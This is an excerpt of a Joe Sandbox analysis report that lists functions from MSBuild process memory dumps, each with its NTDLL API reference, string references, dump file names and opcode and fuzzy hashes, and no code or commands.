RtlDebugPrintTimes.NTDLL ref: 018D0CDC

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ab6ab3c7fd7fc827d9115112ea9a93c041bd8eb98a76a3b489cbf8b344e3385e
Instruction ID: f6cf0c9260e43a4b558de290827b7b373bc93fd5f2b54655d501df81621cf2d1
Opcode Fuzzy Hash: ab6ab3c7fd7fc827d9115112ea9a93c041bd8eb98a76a3b489cbf8b344e3385e
Instruction Fuzzy Hash: 1E51BC70A0020ADFDB24DB6CC981ABEB7F4FF84704F58442CE906D7255E235AE81CB91

Function 018EC720 Relevance: 1.6, APIs: 1, Instructions: 141timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018EC7BF

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 8abac96d3a828b04f2785ba4712c46add00e8a74fd7e978c270fa4e21d7b9bdb
Instruction ID: 3989e6551677319c03396a791885febb2d1ed987e65ef7b5641852b15c056568
Opcode Fuzzy Hash: 8abac96d3a828b04f2785ba4712c46add00e8a74fd7e978c270fa4e21d7b9bdb
Instruction Fuzzy Hash: 3A412271948311ABC720EB6CDC44B5B7BE8BF95B54F44882AF948D3294EB30DA04CBD2

Function 018DEBFC Relevance: 1.6, APIs: 1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca797281141f310731e93a3a92d4c99d1ce257b5a37c92103c95f6d74e0c6d15
Instruction ID: 7fe42343e97faac278e606a092762d39fa734e6b6e035beb7031966d1afb024c
Opcode Fuzzy Hash: ca797281141f310731e93a3a92d4c99d1ce257b5a37c92103c95f6d74e0c6d15
Instruction Fuzzy Hash: 1941E3712143099FD720EF2CC884A2BB7E9FF88318F44482DE55BCB255DB35E9498B51

Function 018A64BA Relevance: 1.6, APIs: 1, Instructions: 123timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018A656C

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: e60c9057ea3d8657e8de424efaa4e47cbee69b9c6718e8e0a26bc95d1d39539c
Instruction ID: b9e2154d9674427ec6040e8499e702d75fd6b704960adeafd0c5c730f9a6cf86
Opcode Fuzzy Hash: e60c9057ea3d8657e8de424efaa4e47cbee69b9c6718e8e0a26bc95d1d39539c
Instruction Fuzzy Hash: DE41E4312083059FEB21DA28D881F6B77D9FF84748F84441DF589D7195E634EA44CB92

Function 018B262C Relevance: 1.6, APIs: 1, Instructions: 119timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018B2710

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: a44cf6b46452bbf00a23c1269aca2f8d81a618e37993769c3eab1928f87bce5b
Instruction ID: 8f0f9d61c86c661255f5fc8b9f9f1f3f011bd6d156aadca786db3358934575d1
Opcode Fuzzy Hash: a44cf6b46452bbf00a23c1269aca2f8d81a618e37993769c3eab1928f87bce5b
Instruction Fuzzy Hash: 1D419D71901705CFCB22EF2CC980AA9B7B6FF95314F1481A9C41ADB3A1DB30BA45CB56

Function 019307C3 Relevance: 1.6, APIs: 1, Instructions: 114timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0193083C

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 6719813181183b8c3aaecafa5d11f7158e87a5ca7036c2b4e0ad7b6975603d2a
Instruction ID: 7ad54fa110e5b7d8f3ebf87de3cef2896ec697d978fc6d934bac77a3a694db49
Opcode Fuzzy Hash: 6719813181183b8c3aaecafa5d11f7158e87a5ca7036c2b4e0ad7b6975603d2a
Instruction Fuzzy Hash: FC418A72A08301ABD720DF29C844B9BBBE8FF88764F044A2EF598D7250D7709904CB92

Function 018D245A Relevance: 1.6, APIs: 1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fad90b9c5aee9e90c9389227fff9a3ba02813af6b9a583903fa53bb6d64b13f
Instruction ID: a70a5d623b63449669a5c5d9f7ecd1328151e4e48b5a9a9fed4a5b6d5ff73308
Opcode Fuzzy Hash: 8fad90b9c5aee9e90c9389227fff9a3ba02813af6b9a583903fa53bb6d64b13f
Instruction Fuzzy Hash: F7316B72600345ABDB319F5DC885EAEBBBAFF80B14F994019E904AB259C7705EC5CBC0

Function 018B4859 Relevance: 1.6, APIs: 1, Instructions: 111timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018B48F7

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: dd4c8087ed8aead098c5bfa199ac6c356cff86cbd58cf52b54ea1029032f2321
Instruction ID: 7d66cbafc963c782f075d4a6a2a0e08db49a103fe79242fcefda1fd00b6543e6
Opcode Fuzzy Hash: dd4c8087ed8aead098c5bfa199ac6c356cff86cbd58cf52b54ea1029032f2321
Instruction Fuzzy Hash: 1F41A0302043069BD725DF1CD8C5B6ABBA9AF80754F14442DEA46CB3A2DB30DA45CB92

Function 018A8A00 Relevance: 1.6, APIs: 1, Instructions: 85timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 018A8A8B

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: ef4fda3528f4cbd096e33d6ddf6b5f458f7162207423809a3755ebef09baf1c6
Instruction ID: 92ac97e7383bbaba8981fa0cf2876cb695ab8c04f879f936d8a8aff3e005cd56
Opcode Fuzzy Hash: ef4fda3528f4cbd096e33d6ddf6b5f458f7162207423809a3755ebef09baf1c6
Instruction Fuzzy Hash: 8F3166B5600A0AEFDB26DF64D540BACB7B1FF48304F044119D90697B91C735FA90CBA2

Function 018E2F98 Relevance: 1.6, Strings: 1, Instructions: 307COMMON

Download Yara Rule

Strings

@, xrefs: 018E3180

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 91134314b149cb873867785f219d867cea729a6552a7a886b7263172f3c6de68
Instruction ID: 7f16abfc0b538ea1e83110e537d3f0389e9644b35543ca27e9b131e232669257
Opcode Fuzzy Hash: 91134314b149cb873867785f219d867cea729a6552a7a886b7263172f3c6de68
Instruction Fuzzy Hash: 39C1A075A002299BDB219F19CC88BAAB7B8BF95711F0440E9E94CEB250E7749F80CF51

Function 0193892A Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 431374f3b8ba28a86b8a892a8a2bcb111548f39acbfbf319698106d78facb9bb
Instruction ID: faa992d9e3a4db793dfcf7484b9d33315ef5a3abba4832eb115d51978b97dec5
Opcode Fuzzy Hash: 431374f3b8ba28a86b8a892a8a2bcb111548f39acbfbf319698106d78facb9bb
Instruction Fuzzy Hash: 2701F735304201ABE6206A599CC4B9A7B69FFC1755B45062CFA4956251CB206C45C7D3

Function 0193A4B0 Relevance: 1.5, APIs: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 0193A51A

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: 4e80c94f808886422395d506c8210560a6bc8d0f94294d19955fec5a4239a38d
Instruction ID: e478cfdc2965d30f8c624fd70580b6158c05a6a2bfc702de6b6b44581247d7f7
Opcode Fuzzy Hash: 4e80c94f808886422395d506c8210560a6bc8d0f94294d19955fec5a4239a38d
Instruction Fuzzy Hash: 8A019A36200209ABCF129F84DC40EDE3F66FB8C754F068101FE19A6260C332D970EB81

Function 01938D20 Relevance: 1.5, APIs: 1, Instructions: 35timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 01938D6A

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID: DebugPrintTimes
String ID:
API String ID: 3446177414-0
Opcode ID: f60c10e6412855fbb328646f089567f0014f26058ab1d086dddc2e502d70f17a
Instruction ID: 234123e0dc3669be01c7a559703bbc569a888d7f2ff0aa65526017314ed01a94
Opcode Fuzzy Hash: f60c10e6412855fbb328646f089567f0014f26058ab1d086dddc2e502d70f17a
Instruction Fuzzy Hash: 96F0B4326046446BE6216A1CAC88BDAFBADFFD4725F8A0515FD5D2721586306C85C7C0

Function 01936420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 019365C1

Memory Dump Source

Source File: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 668bb6184d4d00bf92c2dba00040589f9b13d0a07a1221d40896dc5b7b4694af
Instruction ID: 3a37d2b7a0262eda4301ab8eae74b303fb592c2eb54297d5d5a12a0c716e5392
Opcode Fuzzy Hash: 668bb6184d4d00bf92c2dba00040589f9b13d0a07a1221d40896dc5b7b4694af
Instruction Fuzzy Hash: 119162B1A00219BFEB21DB99CC85FAE7BB8EF55B50F154065F604EB190D674EA00CBA1

Function 018E8402 Relevance: 1.5, Strings: 1, Instructions: 263COMMON

Download Yara Rule

Strings

@, xrefs: 018E8591

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 76cb6493ef20508cdc619bf9ae4e6c1b0ef528cf8bb2585c6fdb9c73ee0c7a62
Instruction ID: 342dbb5b309e633d7ee415200721a78623caf43d21b97e6c7fede42f2d55a842
Opcode Fuzzy Hash: 76cb6493ef20508cdc619bf9ae4e6c1b0ef528cf8bb2585c6fdb9c73ee0c7a62
Instruction Fuzzy Hash: 7D915D71508345AFE721DF69CC84EAFBAE8FF86744F40092EFA84D6151E734DA448B62

Function 018E273C Relevance: 1.5, Strings: 1, Instructions: 249COMMON

Download Yara Rule

Strings

.Local, xrefs: 018E28D8

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: .Local
API String ID: 0-5346580
Opcode ID: 27383e534347c86a7a7c443011b4a09307b122bfa6dc89328dd7082ba6d78f90
Instruction ID: b42f062970600b4302f1cdbac33cf3d3b9a9af38d4291776a3c21f891604e961
Opcode Fuzzy Hash: 27383e534347c86a7a7c443011b4a09307b122bfa6dc89328dd7082ba6d78f90
Instruction Fuzzy Hash: C4A1AE319002299BDB24DF68CC88BA9B7FABF5A354F1541E9D908EB255D7309F80CF91

Function 018AA197 Relevance: 1.5, Strings: 1, Instructions: 238COMMON

Download Yara Rule

Strings

\??\, xrefs: 0190C1E4

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: \??\
API String ID: 0-3047946824
Opcode ID: ee3ee894f58f4bfac1fb87fbff3e935dcfda6853c9930c17f53e77891ba6f631
Instruction ID: 12865b16ab8f15ac4bc672581307e9c5045ad7e66426798450559e2378caed83
Opcode Fuzzy Hash: ee3ee894f58f4bfac1fb87fbff3e935dcfda6853c9930c17f53e77891ba6f631
Instruction Fuzzy Hash: 0DA14A719116299FDB22DB68CC88BAAB7B8EF44B00F1141E9EA0DE7250D7359F84CF51

Function 018E8620 Relevance: 1.5, Strings: 1, Instructions: 223COMMON

Download Yara Rule

Strings

8, xrefs: 019252E3

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: 8
API String ID: 0-4194326291
Opcode ID: bb2c2e124da3b3c99bee2de2e2dd21cd70410f35e036cf0e5d36decb65431fba
Instruction ID: 47835fcc4a7e1c3a9a1064464b662dbfd65ae3a8f6e2cc528c519304f32af9d1
Opcode Fuzzy Hash: bb2c2e124da3b3c99bee2de2e2dd21cd70410f35e036cf0e5d36decb65431fba
Instruction Fuzzy Hash: F2818CB0A00359AFEF20CF99C885FAEBBB9BB4A714F154119F508F7250D375AA44CB90

Function 018E8BF0 Relevance: 1.5, Strings: 1, Instructions: 217COMMON

Download Yara Rule

Strings

(, xrefs: 018E8D3B

Memory Dump Source

Source File: 00000009.00000002.2120338744.00000000018A6000.00000040.00001000.00020000.00000000.sdmp, Offset: 01880000, based on PE: true

Associated: 00000009.00000002.2120338744.0000000001880000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001887000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001900000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001906000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.0000000001942000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A3000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2120338744.00000000019A9000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1880000_MSBuild.jbxd

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: e157663810166ed8db6e8471bddfc279ed153a06a4854b7f8edeae51b67be532
Instruction ID: ff54835debaed200086b152b99ae082a4d62068d9908a59e4d258b40063f21b4
Opcode Fuzzy Hash: e157663810166ed8db6e8471bddfc279ed153a06a4854b7f8edeae51b67be532
